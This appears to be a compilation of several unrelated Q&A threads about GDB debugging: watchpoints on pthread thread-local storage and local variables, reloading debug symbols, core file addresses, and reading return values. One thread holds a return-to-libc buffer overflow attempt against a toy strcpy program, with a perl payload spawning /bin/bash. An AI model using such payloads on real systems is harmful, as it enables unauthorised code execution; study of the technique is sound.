Is it possible to set a watchpoint on pthread's thread-local storage using GDB? I have a program that runs:
struct stored_type *res = pthread_getspecific(tls_key);
...and after a few thousand calls it returns 0 instead of a valid pointer. I'd really love to figure out what's setting that value to 0. I've tried setting breakpoints on pthread_setspecific and pthread_key_delete (the only things I could think of that would reasonably cause the key to change value) and those breakpoints aren't getting hit, so I'm thinking there's some kind of overrun happening.
I'm using Linux x86_64 with glibc 2.23.
... the only things I could think of that would reasonably cause the key to change value
The most likely reasons for pthread_getspecific to return NULL:
you are in fact executing in a new thread, one in which pthread_setspecific hasn't been called,
you are calling pthread_getspecific while current thread is in the process of being destroyed (i.e. pthread_exit is somewhere on the stack),
you are calling pthread_getspecific in a signal handler (pthread_getspecific is not async-signal-safe, and neither are almost all of the other pthread_* functions).
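The first of these causes is easy to reproduce in isolation. Here is a minimal sketch, assuming a made-up key (demo_key) and helper names that are not from the question: the creating thread stores a value, and a freshly created thread reads the same key and gets NULL because it never called pthread_setspecific itself.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

static pthread_key_t demo_key;   /* hypothetical key, for illustration only */
static int demo_value = 42;

/* Runs in a fresh thread that never calls pthread_setspecific. */
static void *read_slot(void *unused)
{
    (void)unused;
    return pthread_getspecific(demo_key);
}

/* Returns 1 if the creating thread still sees its own value
   while the new thread sees NULL for the same key. */
static int new_thread_sees_null(void)
{
    pthread_t thr;
    void *seen_by_new_thread = &demo_value;   /* overwritten by pthread_join */
    int rc, ok;

    rc = pthread_key_create(&demo_key, NULL);
    assert(rc == 0);
    rc = pthread_setspecific(demo_key, &demo_value);
    assert(rc == 0);
    rc = pthread_create(&thr, NULL, read_slot, NULL);
    assert(rc == 0);
    rc = pthread_join(thr, &seen_by_new_thread);
    assert(rc == 0);

    ok = pthread_getspecific(demo_key) == &demo_value
         && seen_by_new_thread == NULL;
    pthread_key_delete(demo_key);
    return ok;
}
```

Calling new_thread_sees_null() from main (built with -pthread) should return 1. If your failing call runs on a worker thread from a pool, this is worth ruling out first.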
Assuming none of the above reasons are true in your case, on with the show.
First we need a test case to demonstrate on.
#include <assert.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
pthread_key_t key;
void *thrfn(void *p) {
int rc = pthread_setspecific(key, &p);
assert(rc == 0);
sleep(60);
rc = pthread_setspecific(key, (void*)0x112233);
assert(rc == 0);
return p;
}
int main()
{
pthread_t thr;
int rc = pthread_key_create(&key, NULL);
assert(rc == 0);
rc = pthread_create(&thr, NULL, thrfn, NULL);
assert(rc == 0);
sleep(90);
return 0;
}
gcc -g -pthread t.c
gdb -q ./a.out
(gdb) start
Now, it helps very much to have GLIBC that is compiled with debug info. Most distributions provide a libc-dbg or similar package, which supplies that. Looking at pthread_setspecific source, you can see that inside the thread descriptor (self) there is a specific_1stblock array, where the space for first PTHREAD_KEY_2NDLEVEL_SIZE == 32 key slots is pre-allocated (32 distinct keys is usually more than enough).
The value that we pass will be stored in self->specific_1stblock[key].data, and that's exactly the location you'll want to set the watchpoint on.
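To make that layout concrete, here is a deliberately simplified model of the first-level block. It is not glibc's code: the model_* names are invented for illustration, and the real implementation also checks the key's sequence number and falls back to separately allocated second-level blocks for larger keys.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_2NDLEVEL_SIZE 32   /* mirrors PTHREAD_KEY_2NDLEVEL_SIZE */

/* One slot per key: a sequence number plus the stored pointer. */
struct model_key_data {
    unsigned long seq;
    void *data;
};

/* Stand-in for the thread descriptor; only the TSD block is modelled. */
struct model_thread {
    struct model_key_data specific_1stblock[MODEL_2NDLEVEL_SIZE];
};

/* Store a value for a key; only the pre-allocated first block is handled. */
static int model_setspecific(struct model_thread *self, unsigned key, void *value)
{
    if (key >= MODEL_2NDLEVEL_SIZE)
        return -1;               /* the model does not cover second-level blocks */
    self->specific_1stblock[key].data = value;
    return 0;
}

/* Read the value back; this is the memory a watchpoint would cover. */
static void *model_getspecific(const struct model_thread *self, unsigned key)
{
    if (key >= MODEL_2NDLEVEL_SIZE)
        return NULL;
    return self->specific_1stblock[key].data;
}
```

The point of the model is only that each thread owns its own array of slots, so a watchpoint has to be set on the slot belonging to the thread you care about.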
In our sample program, key == 0 (as this is the very first key). Putting it all together:
Starting program: /tmp/a.out
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Temporary breakpoint 1, main () at t.c:21
21 int rc = pthread_key_create(&key, NULL);
(gdb) b pthread_setspecific
Breakpoint 2 at 0x7ffff7bc9460: file pthread_setspecific.c, line 28.
(gdb) c
Continuing.
[New Thread 0x7ffff77f6700 (LWP 58683)]
[Switching to Thread 0x7ffff77f6700 (LWP 58683)]
Breakpoint 2, __GI___pthread_setspecific (key=0, value=0x7ffff77f5ef8) at pthread_setspecific.c:28
28 pthread_setspecific.c: No such file or directory.
(gdb) n
35 in pthread_setspecific.c
(gdb) n
28 in pthread_setspecific.c
(gdb) p self
$1 = (struct pthread *) 0x7ffff77f6700
(gdb) watch -l self.specific_1stblock[key].data
Hardware watchpoint 3: -location self.specific_1stblock[key].data
(gdb) c
Continuing.
Hardware watchpoint 3: -location self.specific_1stblock[key].data
Old value = (void *) 0x0
New value = (void *) 0x7ffff77f5ef8
__GI___pthread_setspecific (key=<optimized out>, value=0x7ffff77f5ef8) at pthread_setspecific.c:89
89 in pthread_setspecific.c
Note that the new value is exactly the value that we passed to pthread_setspecific.
(gdb) c
Continuing.
Breakpoint 2, __GI___pthread_setspecific (key=0, value=0x112233) at pthread_setspecific.c:28
28 in pthread_setspecific.c
(gdb) c
Continuing.
Hardware watchpoint 3: -location self.specific_1stblock[key].data
Old value = (void *) 0x7ffff77f5ef8
New value = (void *) 0x112233
__GI___pthread_setspecific (key=<optimized out>, value=0x112233) at pthread_setspecific.c:89
89 in pthread_setspecific.c
This is our second pthread_setspecific call
(gdb) c
Continuing.
Hardware watchpoint 3: -location self.specific_1stblock[key].data
Old value = (void *) 0x112233
New value = (void *) 0x0
__nptl_deallocate_tsd () at pthread_create.c:152
152 pthread_create.c: No such file or directory.
And this is thread destruction, which deallocates the thread descriptor itself.
(gdb) c
Continuing.
[Thread 0x7ffff77f6700 (LWP 58683) exited]
[Inferior 1 (process 58677) exited normally]
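The final write of 0 is part of normal thread teardown, not corruption. As a hedged illustration of the documented side of that behaviour: POSIX says that for a key with a destructor, the slot is reset to NULL before the destructor is called with the old value. The sketch below checks this with invented names (dtor_key, on_thread_exit); it assumes a key with a destructor, whereas the test case above passes NULL.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

static pthread_key_t dtor_key;            /* hypothetical key with a destructor */
static void *value_seen_by_destructor;    /* old value handed to the destructor */
static void *slot_during_destructor;      /* what the slot holds at that moment */

/* Called by the threading library while the thread is exiting. */
static void on_thread_exit(void *old_value)
{
    value_seen_by_destructor = old_value;
    slot_during_destructor = pthread_getspecific(dtor_key);
}

static void *set_and_exit(void *arg)
{
    int rc = pthread_setspecific(dtor_key, arg);
    assert(rc == 0);
    return NULL;
}

/* Returns 1 if the destructor received the old value and the slot was already NULL. */
static int destructor_sees_old_value(void)
{
    static int payload = 7;
    pthread_t thr;
    int rc, ok;

    rc = pthread_key_create(&dtor_key, on_thread_exit);
    assert(rc == 0);
    rc = pthread_create(&thr, NULL, set_and_exit, &payload);
    assert(rc == 0);
    rc = pthread_join(thr, NULL);         /* the destructor has run by now */
    assert(rc == 0);

    ok = value_seen_by_destructor == &payload
         && slot_during_destructor == NULL;
    pthread_key_delete(dtor_key);
    return ok;
}
```

If your watchpoint fires inside thread teardown like this, the thread that owned the value is going away, which points back to the first two causes listed at the top.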
My distribution (Debian) ships debug files in separate packages. So what happens often is that I run a program in gdb until it crashes, in order to obtain a usable backtrace for a bug report. But bt is rather useless, missing the symbol information – because I did not install the corresponding -dbg package.
If I install the package now, is there a way to make gdb search for the symbol files again, without losing my current backtrace?
There is a trick you can use to make gdb try to read symbol files again:
(gdb) nosharedlibrary
(gdb) sharedlibrary
The first command tells it to forget all the symbol information it has, and the second command tells it to re-read it.
I am going to suggest an alternative approach using gdb's gcore command; it may suit your case.
This is gcore description:
(gdb) help gcore
Save a core file with the current state of the debugged process.
Argument is optional filename. Default filename is 'core.<process_id>'
So I have a program that causes a crash:
#include <ctime>
#include <iostream>
int f()
{
time_t curr_ts = time(0);
std::cout << "Before crash " << curr_ts << std::endl;
int * ptr = 0;
*ptr = *ptr +1 ;
std::cout << "After crash " << curr_ts << std::endl;
return *ptr;
}
int main()
{
std::cout << "Before f() " << std::endl;
f();
std::cout << "After f() " << std::endl;
return 0;
}
I compiled it with debug info. However I put the executable with debug info in an archive and for tests use a stripped version.
So it crashes under gdb:
$ gdb ./a.out
Reading symbols from ./a.out...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/crash/a.out
Before f()
Before crash 1435322344
Program received signal SIGSEGV, Segmentation fault.
0x000000000040097d in ?? ()
(gdb) bt
#0 0x000000000040097d in ?? ()
#1 0x00000000004009e0 in ?? ()
#2 0x000000314981ed1d in __libc_start_main () from /lib64/libc.so.6
#3 0x00000000004007f9 in ?? ()
#4 0x00007fffffffde58 in ?? ()
#5 0x000000000000001c in ?? ()
#6 0x0000000000000001 in ?? ()
#7 0x00007fffffffe1a9 in ?? ()
#8 0x0000000000000000 in ?? ()
(gdb) gcore crash2.core
Saved corefile crash2.core
I simply generate a core file with gcore and leave gdb. Then I take the version with debug symbols from the archive, and I can see all the symbols:
$ gdb ./a.out ./crash2.core
Reading symbols from ./a.out...done.
warning: exec file is newer than core file.
[New LWP 15215]
Core was generated by `/home/crash/a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000000000040097d in f () at main.cpp:8
8 *ptr = *ptr +1 ;
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
(gdb) info locals
curr_ts = 1435322344
ptr = 0x0
Update
If you set backtrace past-main on, you will see at least __libc_start_main. The frames above __libc_start_main are not printed when you analyze only the core file saved with gcore (possibly they are not even saved there):
$ gdb ./a.out crash2.core
Reading symbols from ./a.out...done.
warning: exec file is newer than core file.
[New LWP 15215]
Core was generated by `/home/crash/a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000000000040097d in f () at main.cpp:8
8 *ptr = *ptr +1 ;
(gdb) set backtrace past-main on
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
#2 0x000000314981ed1d in __libc_start_main () from /lib64/libc.so.6
Backtrace stopped: Cannot access memory at address 0x4007d0
(gdb)
But if I reproduce the crash under gdb with my test program (with debug info in it), I can see everything (note set backtrace past-main on and set backtrace past-entry on):
$ gdb ./a.out
Reading symbols from ./a.out...done.
(gdb) r
Starting program: /home/crash/a.out
Before f()
Before crash 1435328858
Program received signal SIGSEGV, Segmentation fault.
0x000000000040097d in f () at main.cpp:8
8 *ptr = *ptr +1 ;
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
(gdb) set backtrace past-main on
(gdb) set backtrace past-entry on
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
#2 0x000000314981ed1d in __libc_start_main () from /lib64/libc.so.6
#3 0x00000000004007f9 in _start ()
#4 0x00007fffffffde58 in ?? ()
#5 0x000000000000001c in ?? ()
#6 0x0000000000000001 in ?? ()
#7 0x00007fffffffe1a9 in ?? ()
#8 0x0000000000000000 in ?? ()
(gdb)
Watchpoints on function-local variables usually get removed upon the function return, with a message «Watchpoint 7 deleted because the program has left the block in». Illustration:
struct mystruct{
int a, b, c;
};
void MyFunc(){
mystruct obj;
obj.a = 2;
}
int main(){
MyFunc();
}
gdb session example
(gdb) b 7
Breakpoint 1 at 0x4004f1: file /tmp/test2.cpp, line 7.
(gdb) r
Starting program: /tmp/test2
Breakpoint 1, MyFunc () at /tmp/test2.cpp:7
7 obj.a = 2;
(gdb) wa obj
Hardware watchpoint 2: obj
(gdb) c
Continuing.
Hardware watchpoint 2: obj
Old value = {a = 4195600, b = 0, c = 4195328}
New value = {a = 2, b = 0, c = 4195328}
MyFunc () at /tmp/test2.cpp:8
8 }
(gdb) c
Continuing.
Watchpoint 2 deleted because the program has left the block in
which its expression is valid.
main () at /tmp/test2.cpp:12
12 }
I tried casting it like wa *(mystruct *)&obj and wa *(mystruct *)(void*)&obj, to no avail.
I need it because GDB on the embedded ARM device I'm working with is broken: sometimes it removes a watchpoint for no reason, the backtrace then shows frames marked with "??", and there is a message about a corrupted stack, even though the application is actually fine.
As GDB: Setting Watchpoints says,
GDB automatically deletes watchpoints that watch local (automatic) variables, or expressions that involve such variables, when they go out of scope, that is, when the execution leaves the block in which these variables were defined.
However, as of release 7.3 (thanks to @Hi-Angel and user parcs on IRC for pointing this out; I missed seeing it right there in the documentation), the watch command accepts a -location argument:
Ordinarily a watchpoint respects the scope of variables in expr (see below). The -location argument tells GDB to instead watch the memory referred to by expr. In this case, GDB will evaluate expr, take the address of the result, and watch the memory at that address. The type of the result is used to determine the size of the watched memory.
On older versions of GDB, you can run this instead, using the example from your question:
eval "watch *(mystruct *)%p", &obj
Note that watching locations on the stack may cause spurious notifications if the memory you're watching gets reused by another function's local variables.
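To see why stack locations are prone to this, here is a small sketch with invented function names. It records where two unrelated functions place a local variable when called one after the other from the same caller. On many builds the two addresses coincide, but that depends on the compiler, optimization level and ABI, so treat the result as something to observe rather than a guarantee.

```c
#include <assert.h>
#include <stdint.h>

/* Each function reports where its own local lives. The address is only
   meaningful while the call is active; it is stored as an integer so that
   it can be compared after the function has returned. */
static void first_user(uintptr_t *addr_out)
{
    volatile int local_a = 1;     /* volatile keeps the variable in memory */
    *addr_out = (uintptr_t)&local_a;
}

static void second_user(uintptr_t *addr_out)
{
    volatile int local_b = 2;
    *addr_out = (uintptr_t)&local_b;
}

/* Returns 1 if both locals occupied the same stack address, 0 otherwise. */
static int stack_slot_reused(void)
{
    uintptr_t a = 0, b = 0;
    first_user(&a);
    second_user(&b);
    return a == b;
}
```

When stack_slot_reused() returns 1, a watch -location left on the first function's local would also fire when the second function writes to its own, unrelated variable.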
As an alternative, you can automate the setting of a watchpoint on an automatic variable that keeps coming into and out of scope. Set a breakpoint at a point where it's in scope - for example, at the beginning of the function or block in which it's declared - then attach a watch and continue command:
(gdb) break MyFunc
(gdb) commands $bpnum
>watch obj
>continue
>end
The program I want to attack is the following:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
It is in redhat 6.2, so I didn't think there was anything to consider.
So I tried this:
(gdb) b main
Breakpoint 1 at 0x8048439
(gdb) r
Starting program: /home/asdf/asdfghj
Breakpoint 1, 0x8048439 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) x/s 0xbfffff8e
0xbfffff8e: "/bin/bash"
(gdb) q
So my payload looked like this, the first 260 bytes being the buffer+sfp, then the address of the system function, a 4 byte dummy, and the address of the argument, "/bin/bash".
./asdfghj `perl -e 'print "\x90"x260, "\xe0\x8a\x05\x40", "AAAA", "\x8e\xff\xff\xbf"'`
However this still gives me only a segmentation fault. I have no idea how to fix this, and the addresses come from the dumped core of the program which I set a breakpoint, ran it, then got the addresses.
What should I check to successfully attack the program and what do you think is the problem? Is it that I use /bin/bash, or any of the addresses incorrect?
Plus, I've already set bash2 for default.
Thanks. :)
I am noticing a strange problem when I use a signal handler to dump global data to a text file and then generate a core file. I would expect the data dumped to the file to be the same as what is present in the core file (it is the same global data).
in a header file foo.h
extern char buffer[100][80] ; // Hundred records each of length 80 characters
in foo.c
char buffer[100][80];
.. in a loop ..
snprintf(buffer[i],80,"%s:%d recorded idx = %d\n",__FUNCTION__,__LINE__,i);
in signal_handler.c
.. in a loop ..
fprintf(..dump data to text file..)
The data is dumped to the text file alright. I run the program in gdb and I issue the ABRT signal (the signal I am handling) via kill. In gdb I see
(gdb) p &buffer[0]
$3 = (char (*)[80]) 0x1002c8970
I continue and generate the core file. In the core dump I see
(gdb) p &buffer[0]
$2 = (char (*)[80]) 0x1002c9a80
The difference between the two positions is 0x1110 (4368 bytes).
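For reference, the gap between the two addresses printed above can be checked with a few lines of C. This is only the arithmetic; address_gap is a made-up helper name, and the two constants are the values from the gdb output.

```c
#include <assert.h>
#include <stdint.h>

/* Distance in bytes from the address seen in the live process
   to the address seen in the core file. */
static uint64_t address_gap(uint64_t live_addr, uint64_t core_addr)
{
    return core_addr - live_addr;
}
```

address_gap(0x1002c8970, 0x1002c9a80) gives 0x1110, which is 4368 in decimal, so the figure is a hexadecimal difference.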
My question is why do I see this discrepancy in the core file ? Any leads would be appreciated!
Thanks
John
EDIT To clarify, the problem is not in generating the core via GDB
Full code without signal handlers to isolate the problem.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX 100
char buffer[100][80];
int main()
{
int i = 0;
int idx = 0;
FILE *fp = NULL;
fp = fopen("test.txt","w");
if (!fp)
exit(1);
for (i=0; i < 5500; i++) {
snprintf(buffer[idx],80,"%s:%d idx = %d\n",__FUNCTION__, __LINE__, i);
idx = ((idx + 1)% MAX);
}
for (i = 0 ; i < MAX; i++)
fprintf(fp,"%s",buffer[i]);
fclose(fp);
abort();
return 0;
}
The problem is not when I am trying to run in GDB, the problem is that in the core file generated,
(gdb) p buffer[0]
$2 "c0 - idx = 54\n", '\0' , "main:20 0x7ef9524"
the buffer is offset by 0x1110 bytes. I had used GDB to check if the buffer was corrupted. Sorry about the confusion.
Please provide a stand-alone example. I can explain a different address when the core is produced from outside GDB, but not when it is produced from inside GDB.
Here is what I see:
$ cat foo.c
#include <stdio.h>
#include <stdlib.h>
char buf[100][80];
int main()
{
sprintf(buf[0], "hello");
sprintf(buf[1], "hello again");
abort();
}
$ gcc -g foo.c -fPIC -pie # PIE executable so its address can be randomized
$ gdb -q a.out
Reading symbols from /tmp/a.out...done.
(gdb) r
Program received signal SIGABRT, Aborted.
0x00007ffff7a8ca75 in raise () at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
(gdb) p &buf[0]
$1 = (char (*)[80]) 0x7ffff81ff060
(gdb) sig SIGABRT
Program terminated with signal SIGABRT, Aborted.
The program no longer exists.
(gdb) q
$ gdb -q a.out core
Reading symbols from /tmp/a.out...done.
[New Thread 20440]
Core was generated by `/tmp/a.out'.
Program terminated with signal 6, Aborted.
#0 0x00007ffff7a8ca75 in raise () at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
(gdb) p &buf[0]
$1 = (char (*)[80]) 0x7ffff81ff060 # same address as before
(gdb) q
$ ./a.out
Aborted (core dumped)
$ gdb -q a.out core
Reading symbols from /tmp/a.out...done.
[New Thread 20448]
Core was generated by `./a.out'.
Program terminated with signal 6, Aborted.
#0 0x00007fef9dcb5a75 in raise () at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
(gdb) p &buf[0]
$1 = (char (*)[80]) 0x7fef9e428060 # different address due to ASLR
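If you want to compare what the running program saw with what the core file shows, one option is to have the program log the address itself. A minimal sketch, assuming a helper name (log_buf_address) that is not part of the example above:

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

static char buf[100][80];

/* Prints the run-time address of buf[0] to the given stream and returns it.
   Within one process the value is stable; across separate runs of a PIE
   executable it may differ because of ASLR. */
static uintptr_t log_buf_address(FILE *out)
{
    fprintf(out, "&buf[0] = %p\n", (void *)&buf[0]);
    return (uintptr_t)&buf[0];
}
```

Calling log_buf_address(stderr) just before abort() gives you an address to compare against p &buf[0] in the core produced by that same run.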
Is it possible to inspect the return value of a function in gdb assuming the return value is not assigned to a variable?
I imagine there are better ways to do it, but the finish command executes until the current stack frame is popped off and prints the return value -- given the program
int fun() {
return 42;
}
int main( int argc, char *v[] ) {
fun();
return 0;
}
You can debug it as such --
(gdb) r
Starting program: /usr/home/hark/a.out
Breakpoint 1, fun () at test.c:2
2 return 42;
(gdb) finish
Run till exit from #0 fun () at test.c:2
main () at test.c:7
7 return 0;
Value returned is $1 = 42
(gdb)
The finish command can be abbreviated as fin. Do NOT use f, which is the abbreviation of the frame command!
Yes, on 32-bit x86 just examine the EAX register by typing print $eax (on x86-64, use print $rax). For most functions, the return value is stored in that register, even if it's not used.
The exceptions on 32-bit x86 are functions returning types that don't fit in one 32-bit register: 64-bit integers (long long) come back in EDX:EAX, floating-point values such as double come back on the x87 stack, and most structs or classes are returned through memory.
The other exception is if you're not running on an Intel architecture. In that case, you'll have to figure out which register is used, if any.
Here's how to do this with no symbols.
gdb ls
This GDB was configured as "ppc64-yellowdog-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib64/libthread_db.so.1".
(gdb) break __libc_start_main
Breakpoint 1 at 0x10013cb0
(gdb) r
Starting program: /bin/ls
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Breakpoint 1 at 0xfdfed3c
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 4160418656 (LWP 10650)]
(no debugging symbols found)
(no debugging symbols found)
[Switching to Thread 4160418656 (LWP 10650)]
Breakpoint 1, 0x0fdfed3c in __libc_start_main () from /lib/libc.so.6
(gdb) info frame
Stack level 0, frame at 0xffd719a0:
pc = 0xfdfed3c in __libc_start_main; saved pc 0x0
called by frame at 0x0
Arglist at 0xffd71970, args:
Locals at 0xffd71970, Previous frame's sp is 0xffd719a0
Saved registers:
r24 at 0xffd71980, r25 at 0xffd71984, r26 at 0xffd71988, r27 at 0xffd7198c,
r28 at 0xffd71990, r29 at 0xffd71994, r30 at 0xffd71998, r31 at 0xffd7199c,
pc at 0xffd719a4, lr at 0xffd719a4
(gdb) frame 0
#0 0x0fdfed3c in __libc_start_main () from /lib/libc.so.6
(gdb) info fr
Stack level 0, frame at 0xffd719a0:
pc = 0xfdfed3c in __libc_start_main; saved pc 0x0
called by frame at 0x0
Arglist at 0xffd71970, args:
Locals at 0xffd71970, Previous frame's sp is 0xffd719a0
Saved registers:
r24 at 0xffd71980, r25 at 0xffd71984, r26 at 0xffd71988, r27 at 0xffd7198c,
r28 at 0xffd71990, r29 at 0xffd71994, r30 at 0xffd71998, r31 at 0xffd7199c,
pc at 0xffd719a4, lr at 0xffd719a4
The formatting got a bit messed up there. Note the use of "info frame" to inspect frames, and "frame N" to switch your context to another frame (up and down the stack).
bt also shows an abbreviated stack to help out.